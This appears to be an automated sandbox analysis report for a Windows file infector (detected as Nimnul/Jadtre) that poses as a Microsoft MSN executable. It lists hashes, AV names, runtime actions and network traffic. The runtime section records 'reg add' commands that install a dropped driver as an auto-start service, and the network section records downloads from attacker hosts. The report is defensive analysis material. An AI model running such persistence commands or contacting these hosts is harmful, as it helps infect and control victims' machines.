Analysis Date: 2016-02-18 02:19:33
MD5: af06ad80a53484cb0ffad33d2a4e460a
SHA1: df596e0395212f2912a16b435904db3f059a7e25

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section: .data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section: .rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
Section: jc md5: c72db411ce29ea70deb2b99805cdadb7 sha1: 2464aac6678d1b8ccd31f287cb063d6070b4f28e size: 241664
Timestamp: 2001-07-19 19:30:07
Pdb path: pdb
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PEhash: 4157d0e438648ccf527723afc9ac097b76a63859
IMPhash: 6df6e99bae10817058127898c796b82d
AV CA (E-Trust Ino): Win32.VJadtre.3
AV Rising: Win32.Yxi.a
AV Mcafee: W32/Simfect
AV Avira (antivir): W32/Nimnul.C
AV Twister: Virus.7BF7@1F7AB2@2FF33F.mg
AV Ad-Aware: Win32.VJadtre.3
AV Alwil (avast): Jadtre-A [Drp]
AV Eset (nod32): Win32/Wapomi.AE virus
AV Grisoft (avg): Worm/AutoRun.LY.dropper
AV Symantec: W32.Loorp.C!inf
AV Fortinet: W32/Nimnul.C
AV BitDefender: Win32.VJadtre.3
AV K7: Virus ( 001ab60e1 )
AV Microsoft Security Essentials: Virus:Win32/Jadtre.L
AV MicroWorld (escan): Win32.VJadtre.3
AV MalwareBytes: Trojan.FakeMS.ED
AV Authentium: W32/Nimnul.A
AV Emsisoft: Win32.VJadtre.3
AV Frisk (f-prot): W32/Nimnul.A
AV Ikarus: Trojan-Dropper.Win32.Bototer
AV Zillya!: Virus.Nimnul.Win32.1
AV Kaspersky: Virus.Win32.Nimnul.c
AV Trend Micro: PE_NIMNUL.A
AV VirusBlokAda (vba32): Virus.Nimnul.d
AV CAT (quickheal): W32.Numnul.C
AV BullGuard: Win32.VJadtre.3
AV Arcabit (arcavir): Win32.VJadtre.3
AV ClamAV: W32.Loorp
AV Dr. Web: Win32.Rmnet.5
AV F-Secure: Win32.VJadtre.3

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\3f056abc.exe
Creates Process: C:\3f056abc.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://193.166.255.171:8080/mac.htm?69

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝ NULL
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\NetworkService\Favorites\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\8RSTUVEF\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\HO43W1VI\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\P1PLT26Q\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Favorites\Desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\XYQ0SKUV\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Mutex: Shell.CMruPidlList
Winsock DNS: 193.166.255.171

Process
↳ C:\3f056abc.exe

Creates File: C:\WINDOWS\system32\appmgmts.dll
Creates File: PIPE\SfcApi
Creates File: C:\Documents and Settings\Infotmp.txt
Starts Service: AppMgmt

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: \Device\00000025
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: \Device\00000002
Creates File: NewAss
Creates File: C:\WINDOWS\system32\c_20178.nls
Creates File: \Device\00000029
Creates File: \Device\Afd\Endpoint
Creates File: \Device\00000027
Creates File: C:\WINDOWS\TEMP\4cdc773a.rar
Creates File: C:\WINDOWS\system32\2F7470CA.sys
Creates File: \Device\0000002F
Creates File: C:\WINDOWS\system32\drivers\tcpip.sys
Creates File: \Device\00000026
Creates File: \Device\0000002A
Creates File: C:\WINDOWS\TEMP\s7bde2ec2.txt
Creates File: \Device\00000003
Creates File: C:\Documents and Settings\Infotmp.txt
Creates File: \Device\00000028
Creates File: C:\WINDOWS\system32\dmutilio.dll
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File: C:\Documents and Settings\Infotmp.txt
Deletes File: C:\WINDOWS\TEMP\r3a3a02b3.txt
Deletes File: C:\3f056abc.exe
Deletes File: C:\WINDOWS\TEMP\s7bde2ec2.txt
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ErrorControl /t REG_DWORD /d 1 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ImagePath /t REG_EXPAND_SZ /d system32\2F7470CA.sys /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 2F7470CA /f
Creates Process: reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r3a3a02b3.txt
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Type /t REG_DWORD /d 1 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Start /t REG_DWORD /d 2 /f
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe http://193.166.255.171:8080/mac.htm?69
Winsock URL: http://www.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&event=started&compact=1&numwant=100&no_peer_id=1
Winsock URL: http://vip.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&compact=1&numwant=100&no_peer_id=1

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL
Creates File: WMIDataDevice

Process
↳ Pid 1852

Process
↳ Pid 1160

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 2F7470CA /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\Service ➝ 2F7470CA\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\ConfigFlags ➝ NULL

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Start /t REG_DWORD /d 2 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\Start ➝ 2

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v Type /t REG_DWORD /d 1 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\Type ➝ 1

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ImagePath /t REG_EXPAND_SZ /d system32\2F7470CA.sys /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\ImagePath ➝ system32\2F7470CA.sys\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\2F7470CA /v ErrorControl /t REG_DWORD /d 1 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\2F7470CA\ErrorControl ➝ 1

Process
↳ reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r3a3a02b3.txt

Creates File: C:\WINDOWS\TEMP\r3a3a02b3.txt

Network Details:

DNS: www.a.shifen.com
Type: A
103.235.46.39
DNS: www.a.shifen.com
Type: A
103.235.46.39
DNS: 69.nsb927.com
Type: A
193.166.255.171
DNS: 69.ns792.com
Type: A
54.186.220.79
DNS: 69.nsvjn987.com
Type: A
192.155.89.148
DNS: router.bitcomet.net
Type: A
127.0.0.1
DNS: router.utorrent.com
Type: A
82.221.103.244
DNS: router.bittorrent.com
Type: A
67.215.246.10
DNS: vip.ere5453.com
Type: A
23.253.46.64
DNS: www.ere5453.com
Type: A
23.253.46.64
DNS: www.baidu.com
Type: A
DNS: 69.ns768.com
Type: A
DNS: 69.ns529.com
Type: A
DNS: 69.nsvhn987.com
Type: A
DNS: 69.ns2275ab.com
Type: A
DNS: router.bitcomet.com
Type: A
HTTP GET: http://54.186.220.79:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://54.186.220.79:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://54.186.220.79:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://193.166.255.171:8080/mac.htm?69
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://vip.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&compact=1&numwant=100&no_peer_id=1
User-Agent: dolit
HTTP GET: http://www.ere5453.com:6969/announce?info_hash=%FAz%22%3C%AA%9F%BE%19%0A%19%A5nl%5E%9A%5F%0E%C7a%B5&peer_id=%2DDL1000%2Dw3aalGNx6Ez2&port=9371&uploaded=16384&downloaded=0&left=16384&event=started&compact=1&numwant=100&no_peer_id=1
User-Agent: dolit

Raw Pcap

Strings